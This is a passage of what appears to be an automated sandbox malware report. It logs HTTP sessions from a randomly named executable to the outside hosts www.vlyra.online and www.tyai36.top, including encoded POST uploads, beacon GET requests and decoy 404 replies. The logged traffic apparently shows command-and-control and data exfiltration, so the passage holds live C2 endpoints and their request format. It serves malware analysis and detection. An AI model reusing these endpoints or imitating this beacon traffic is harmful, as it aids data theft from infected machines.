                                                                                  Aug 27, 2024 17:47:07.386574030 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                  Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                  Aug 27, 2024 17:47:07.552975893 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                  Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.11.2049814203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:09.920603991 CEST3867OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 4d 6e 6f 56 45 74 62 77 6f 4e 67 44 64 53 74 4b 69 6c 56 37 31 75 72 65 44 76 76 71 4d 50 62 47 48 5a 41 43 73 6c 4e 67 52 64 34 67 58 4f 75 2f 74 6b 48 56 57 37 74 6a 74 4f 79 61 75 72 38 2f 48 79 57 6c 75 65 48 69 67 7a 71 77 73 41 30 50 77 36 6b 51 39 6c 47 57 71 45 73 6e 47 31 7a 6f 61 58 6a 4f 57 38 34 36 36 4c 31 75 48 47 4d 71 6c 50 4c 53 7a 63 45 52 4b 45 41 39 55 6f 31 75 6d 30 6d 6f 53 53 35 74 4a 55 53 6c 71 67 57 30 79 38 6b 34 55 5a 4e 4d 52 4c 43 59 70 45 32 78 67 4b 79 71 50 69 6d 5a 41 4f 38 70 39 64 30 6e 4c 44 66 38 4b 44 65 4e 49 47 53 77 6b 2b 41 6f 58 4d 46 63 2b 32 74 5a 71 6b 74 47 68 41 72 42 58 32 39 7a 47 70 71 42 41 74 47 4d 35 33 66 35 4c 53 64 6d 2f 53 73 74 69 4f 30 35 57 36 58 66 4a 58 34 38 6b 77 61 75 65 33 36 47 45 38 33 4c 71 56 71 4f 57 72 34 2f 6b 56 4b 62 58 6c 6e 37 4d 34 65 6a 66 57 74 75 76 5a 37 68 31 43 6d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFMnoVEtbwoNgDdStKilV71ureDvvqMPbGHZACslNgRd4gXOu/tkHVW7tjtOyaur8/HyWlueHigzqwsA0Pw6kQ9lGWqEsnG1zoaXjOW8466L1uHGMqlPLSzcERKEA9Uo1um0moSS5tJUSlqgW0y8k4UZNMRLCYpE2xgKyqPimZAO8p9d0nLDf8KDeNIGSwk+AoXMFc+2tZqktGhArBX29zGpqBAtGM53f5LSdm/SstiO05W6XfJX48kwaue36GE83LqVqOWr4/kVKbXln7M4ejfWtuvZ7h1CmKbpJvXxo+QAydKNkYmYTjABPF1pGO30yVOmvYXzWS7A4HtJI+eVAWSPuUllt7ZbLVsOx+ibifa0ldxULQqQDmj2z/8qky2/NgCpro8v7I1AJaL7Cd0wO8iIe332DSpjNt8PPisbNixTIVoLVvPWVSLD02+z57EejYWJL/rX1sRHjilSuWCuyVzGVvfqBqpDJi28QjbKhMWa+Jgw2RTwdk7+k0m//jzgiMBChTupM5EFhu2ZN3uCz4+h/bHYCg1M/7mPGS4K4gjReb47X3/b87yGAbFdoeGc2cxUOXh3fOdYB2RlU1z41UL1Vx3ND8iLiygI9GmRPgprqTVBJK9F6YSIOiraTKsth+HTkdApNXbQWYE97ZZyabIf9KXi9oC3Of/RMWwfoXQHJE6ep3wvIhwE2is1vyMbx85ZQyVkUgfUZqpV4/83D4tehYYrdwbEkSL9yMs5P9lEfI01f58rRkuN9ysBsejfXWI/UgEES0weXMW0hSCZbGSVlm9dRdb9dbGEj3Cmjk2frwGDFAhUnIgJSv2pvESWG0lnJyil3Z1bst92QQejLhnPAsWaTbEn4BALaUUHbWlMqQLBk6eo3trqGcAIlM1e576cM+3nVRh+cA52WBNad2r2J893wmMH+eVLXto/VqumPClAHla8p/XMwF+ot3fvoKm [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:09.920715094 CEST9023OUTData Raw: 74 49 6e 6b 7a 64 50 59 53 53 42 53 61 59 42 70 38 61 72 69 75 35 52 4d 47 4a 70 71 47 37 44 6d 50 36 50 4f 78 6a 43 33 30 70 68 4f 6f 30 69 6e 51 43 39 49 4e 50 35 4a 6d 65 78 72 54 62 66 42 4f 55 6d 66 62 74 6a 39 65 30 47 71 33 41 39 62 62 51
                                                                                  Data Ascii: tInkzdPYSSBSaYBp8ariu5RMGJpqG7DmP6POxjC30phOo0inQC9INP5JmexrTbfBOUmfbtj9e0Gq3A9bbQypSQtkj2o9aIFvPxrOIIDN11fgHbP7+3qIXbMeRFipLbzMO6HMSb1ExnmMtq1AOlgGBOuExShoAw42/68tSGHT/cWU+XDSj9Kmfh9o2s7Fh3IbCYZzBrRL8MSB+Z63MBq8Juac+xQKl2RMp/BhEVVZSAwnFLOA7Ot
                                                                                  Aug 27, 2024 17:47:10.100521088 CEST1289OUTData Raw: 73 38 62 39 30 65 33 49 69 34 52 74 6f 43 59 55 7a 76 70 51 57 37 38 6e 78 49 37 73 46 7a 45 73 44 58 7a 76 74 46 45 79 76 48 48 42 31 6d 6b 33 42 58 6c 42 62 46 31 69 43 59 33 35 45 4e 79 53 39 32 61 30 42 79 4b 4c 45 73 73 42 4f 42 55 59 37 4f
                                                                                  Data Ascii: s8b90e3Ii4RtoCYUzvpQW78nxI7sFzEsDXzvtFEyvHHB1mk3BXlBbF1iCY35ENyS92a0ByKLEssBOBUY7O9pJv1ZpDeth0pNXlFn4zWZ6sNx0PGrz3FzzSrphltF2BTT6x+/fvZxQMsgiM6vtuIAnN+BUQQYD7ERVO0F6sSzscb2TkTcZnwuHOlGwuXedIN+xSMpHdSEZHKhvvnlmHpkWNr/AkaB7LEwgxHh0BIFvrg+dgAGKdb
                                                                                  Aug 27, 2024 17:47:10.100584984 CEST6445OUTData Raw: 71 42 72 2f 6b 74 6a 63 2f 6c 33 49 69 36 4b 54 42 56 33 70 54 75 31 30 35 37 43 39 6f 7a 39 79 4f 55 6c 34 6e 6c 64 75 63 58 4d 45 6b 4a 49 71 49 6d 6d 39 69 73 57 66 4a 34 34 75 39 70 77 61 31 37 6c 6a 46 6a 63 49 4d 59 37 43 49 43 31 6d 61 2f
                                                                                  Data Ascii: qBr/ktjc/l3Ii6KTBV3pTu1057C9oz9yOUl4nlducXMEkJIqImm9isWfJ44u9pwa17ljFjcIMY7CIC1ma/+aRHxh3DnqRYvvrvC/cjffk+Cr10uYrrGTPCsLLf99BO4WAH2zfGLO1oM6TLg4fVEC1SmSVjnSI8HjMX4FxuNHdqPNuC4SSttTbFZw4eRk/Y6YOwb7CFMhntRllHoda2i4mOoSZgq4Mkx5sciTaYvZSu1RZYf+uBq
                                                                                  Aug 27, 2024 17:47:10.100652933 CEST5156OUTData Raw: 51 55 55 74 30 72 6e 4e 4a 50 70 6f 78 39 30 38 47 67 4e 54 41 44 39 74 54 51 73 51 4b 43 32 4e 53 5a 79 76 4c 37 36 48 5a 31 6e 51 6d 67 38 75 2b 65 50 68 39 51 31 64 54 64 54 79 47 6c 6a 78 70 75 67 54 54 4c 46 59 70 4f 31 63 46 62 52 4f 4a 37
                                                                                  Data Ascii: QUUt0rnNJPpox908GgNTAD9tTQsQKC2NSZyvL76HZ1nQmg8u+ePh9Q1dTdTyGljxpugTTLFYpO1cFbROJ7E7Xp3i9OHBLkVAJfKYHHCwqFSwJMySyKIBhY/1MEF0GqBBSUGJzoHJrHPChOV4HszOX3rXaZVzjPgl1Sx2zpXcAkyp4h8vmjLUFAOkVtFkg0Y0twzepGOwCVGRdBktkby3xHNa68LfeAw5es3g4P3DWsvFvqJRMvt
                                                                                  Aug 27, 2024 17:47:10.100811958 CEST3867OUTData Raw: 51 39 47 2b 71 79 32 66 78 64 2f 73 37 77 76 63 35 73 79 6e 42 54 45 50 6b 43 4a 34 66 36 78 78 70 4d 36 46 31 31 51 43 53 6c 2f 69 78 55 47 6c 67 35 2f 30 68 47 56 69 5a 47 32 55 42 77 43 6e 66 54 76 4f 44 38 6d 4b 38 59 53 4e 6b 77 71 67 4b 65
                                                                                  Data Ascii: Q9G+qy2fxd/s7wvc5synBTEPkCJ4f6xxpM6F11QCSl/ixUGlg5/0hGViZG2UBwCnfTvOD8mK8YSNkwqgKeN9/FDVKJKYAup/XE4YE2XJ0KkVBgj3U9iCfcOS74WDC4NS1hVY7YIX2UFN+Tqu28KF5q23V1c1MxMMP2JpwMJK4aqYr8pIJDqg+lVytoQmroJwac2QPH8mXTgnQvkzx89qKKBrqrMXW2h+EdO9XkUy6cE4ynjDjH6
                                                                                  Aug 27, 2024 17:47:10.101027966 CEST9023OUTData Raw: 42 6d 6e 6d 46 57 47 33 4e 4c 55 67 33 4e 6e 61 49 39 6b 49 53 6f 4a 2f 79 2f 31 5a 30 2f 63 44 37 79 49 39 4e 31 73 30 36 6e 4f 45 58 37 73 32 52 48 6a 6b 6e 33 74 75 61 66 79 71 45 58 43 63 36 46 66 34 54 59 52 35 68 58 48 37 31 54 36 71 48 62
                                                                                  Data Ascii: BmnmFWG3NLUg3NnaI9kISoJ/y/1Z0/cD7yI9N1s06nOEX7s2RHjkn3tuafyqEXCc6Ff4TYR5hXH71T6qHbTUFL5aZfA7K3QLbqXitfcjJe4pxbqcPEzc7SFX1CMvQBQlmqJbGB/Wd3K/F6OruY+guvIiZANGFgNSHU3WNBmqWQjjnHmrurFaIef2oNhGYjhlkNa0SKHvmMwOlxgRIAKwZ5o4XsHmqPlFubUrQwYV1FAyDVe6F9x
                                                                                  Aug 27, 2024 17:47:10.281002998 CEST2578OUTData Raw: 67 63 35 4c 2b 69 44 70 76 77 32 47 67 42 4a 52 4f 47 4d 42 77 42 6c 30 31 30 63 4c 70 69 55 52 39 78 5a 4f 72 57 6d 52 43 65 72 5a 54 6d 56 68 32 70 44 47 32 63 2f 51 5a 6c 4b 71 5a 54 6b 51 49 47 4e 2f 4d 63 61 79 2f 6e 54 33 4d 79 35 6f 45 4e
                                                                                  Data Ascii: gc5L+iDpvw2GgBJROGMBwBl010cLpiUR9xZOrWmRCerZTmVh2pDG2c/QZlKqZTkQIGN/Mcay/nT3My5oENFvjBDq2hBOd8vfHHlNtVaX2wEH4o3TjH7yeNJaNZYoIxP0Fj1MoGakQR1zkRWDJzSjgLjwOo5TaEmy4ATs+d+lqhhLqIe+AjJNhmNWWbB77CSPJ6/oz9WMhZUM9kSK0u8uOa6oxwH9xMDBxbtjfdFWglsQGDFlnqf
                                                                                  Aug 27, 2024 17:47:10.281105042 CEST5156OUTData Raw: 54 2f 79 52 57 6f 77 4a 48 53 6a 6c 6e 73 54 59 4a 31 71 78 44 33 2b 68 33 51 2f 57 32 5a 43 37 64 4e 64 66 2f 59 61 38 36 57 76 4e 2b 2f 4e 39 4f 73 76 74 46 4f 77 48 5a 2f 4c 7a 52 6b 62 33 38 73 79 49 70 65 50 35 4c 6b 32 2f 75 6a 69 78 2b 50
                                                                                  Data Ascii: T/yRWowJHSjlnsTYJ1qxD3+h3Q/W2ZC7dNdf/Ya86WvN+/N9OsvtFOwHZ/LzRkb38syIpeP5Lk2/ujix+PHGfo+rXl5iYp6XMz544js9Aqe7Ku4uOYu/ZtUDv/buQ3HinEYPQ8jpGlJ+Jayajt26HRbWPyzBO9RjS4sPpUmv0OK377GK6cssucXyxzWvDBUdpgVK5e7EuMd7WJgzP1LfscaqQrABHoIqF/v3Cq+kXD26PafZ63X
                                                                                  Aug 27, 2024 17:47:10.281166077 CEST7114OUTData Raw: 41 4c 47 34 48 62 46 55 62 68 70 47 4e 4a 68 6f 69 4e 35 46 5a 6f 63 6b 36 53 73 53 54 51 72 39 4b 66 62 61 48 41 4f 42 65 68 52 31 32 35 75 44 4f 33 73 46 45 4c 6a 34 64 4a 72 33 65 52 32 61 30 32 2f 70 51 36 2b 69 53 39 6c 6b 75 38 79 42 76 4c
                                                                                  Data Ascii: ALG4HbFUbhpGNJhoiN5FZock6SsSTQr9KfbaHAOBehR125uDO3sFELj4dJr3eR2a02/pQ6+iS9lku8yBvLmkdyiulisQjUddGpM72fWhEjUNoWYF1jta7hhp78Xf8ChysohFd3cCHMyOTngdO95M/1u/5oSRttl6oRL5HpeOH9d8FTmR1XNizPhn5W/W9AUVlg3FKIz30tMXQkwKfepB8cuXVKDz7O3yQ7TSVhXr0MpjkIq5n2G
                                                                                  Aug 27, 2024 17:47:10.488800049 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:47:10 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:10.489088058 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                  Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.11.2049815203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:12.621155024 CEST525OUTGET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:47:12.797327042 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:47:12 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:12.797436953 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                                                  Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                                                  Aug 27, 2024 17:47:12.797532082 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                                                  Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                                                  Aug 27, 2024 17:47:12.797597885 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                                                  Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                                                  Aug 27, 2024 17:47:12.797657013 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                                                  Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                                                  Aug 27, 2024 17:47:12.797712088 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                                                  Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                                                  Aug 27, 2024 17:47:12.797770977 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                  Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                                                  Aug 27, 2024 17:47:12.798173904 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                                                  Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                                                  Aug 27, 2024 17:47:12.798250914 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                                                  Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                                                  Aug 27, 2024 17:47:12.798314095 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                                                  Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                                                  Aug 27, 2024 17:47:12.963604927 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                                                  Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.11.204981638.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:18.664393902 CEST782OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
